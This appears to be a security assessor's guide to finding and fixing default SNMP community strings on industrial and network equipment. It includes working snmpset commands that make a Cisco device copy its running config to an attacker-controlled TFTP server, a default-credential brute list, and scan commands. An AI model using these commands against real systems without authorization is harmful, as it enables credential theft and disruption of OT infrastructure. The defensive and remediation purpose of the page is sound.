SNMP Default Community Strings
SNMP v1 and v2c authenticate the entire protocol with a single shared string
sent in clear. Hardware ships with default strings (public read,
private read-write), every vendor knows this, and somehow every OT
environment still has a list of devices answering to them.
This page is the 15-minute check.
What you can do with public
Read everything the device exposes — and on industrial hardware that includes:
- System uptime, firmware version (CVE selection trivial)
- Interface table → topology mapping
- ARP table → adjacent IPs you didn’t know about
- Routing table → reachable networks
- Process listing (some Linux-based PLCs)
- Currently-logged-in user accounts (HP printers, some switches)
- USB device tree (Cisco, Juniper)
- Wireless SSIDs and PSKs (some Aruba/Cisco firmware)
What you can do with private
Everything public lets you read, plus write — change the running
config:
# Read entire config from a Cisco device
snmpwalk -v2c -c public target 1.3.6.1.4.1.9.9.96
# Force the device to copy running-config to a TFTP server you control
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1 i 1
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1 i 4
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1 i 1
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a "10.10.10.5"
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1 s "config.txt"
snmpset -v2c -c private target 1.3.6.1.4.1.9.9.96.1.1.1.1.14.1 i 1Now you have the running config, including any local credentials hashed with weak Cisco type-7 (recoverable).
Network gear writeable over SNMP private is full-config exfil in 10
seconds and persistent backdoor in 30. Treat default community strings on
any switch, router, firewall, or industrial gateway as an immediate
finding.
Finding everything in 15 minutes
Nmap
nmap -sU -p 161 --script "snmp-brute,snmp-info,snmp-sysdescr,snmp-interfaces,snmp-processes,snmp-win32-software" 10.20.0.0/16snmp-brute runs through the default community list. The ones that respond
are the immediate findings.
onesixtyone (faster sweep)
onesixtyone -c community-list.txt -i hosts.txt -o findings.txtcommunity-list.txt — at minimum:
public
private
admin
manager
cisco
default
guest
read
write
test
0
1
agent
snmpdVendor-specific additions: community (HP), OrigEquipMfr (Brocade),
tivoli (IBM), ILMI (Cisco ATM).
snmpwalk (interactive)
snmpwalk -v2c -c public target system # device info
snmpwalk -v2c -c public target interfaces # NIC table → topology
snmpwalk -v2c -c public target ip # routing + ARP
snmpwalk -v2c -c public target tcp # listening portsCommon OT-specific gotchas
- HMI / SCADA endpoints (Wonderware, Citect, GE iFix) often listen on
SNMP with
public. Look for vendor-specific OIDs once the string is confirmed. - Modbus gateways (Schneider, Moxa, Westermo) — SNMP
publicreveals the serial backend and slave IDs, which is half of a Modbus exploit chain. - Print/MFP devices (HP JetDirect, Xerox, Canon) — SNMP
public/privateis on by default for years post-install. Yes, in OT, the printer in the control room is in scope. - UPS / PDU (APC, Eaton, Tripp Lite) —
privatelets you reboot or power off devices remotely. In an OT environment, that is loss-of-view.
The fix (priority order)
- Disable SNMPv1 and SNMPv2c everywhere. Use SNMPv3 with
authPriv(SHA + AES at minimum). - If SNMPv2c cannot be disabled (legacy device with no v3 support):
- Change the community string to a random ≥ 24-char value
- Restrict SNMP by source IP at the management interface and on the network
- Disable write community entirely; never use
private-equivalent
- Move SNMP off the OT VLAN entirely. The polling host belongs in a management VLAN that reaches OT through a firewall rule scoped to UDP/161 from the monitoring server only.
- Egress filtering — SNMP traps should leave only through the management VLAN. Stop them at the perimeter.
Quick check on your own estate
# IT side
nmap -sU -p 161 --script snmp-brute corporate-cidr/16
# OT side (only with change-window + read-only mode)
onesixtyone -c short-list.txt -i ot-devices.txtAny host that answers public is in your next-engagement findings.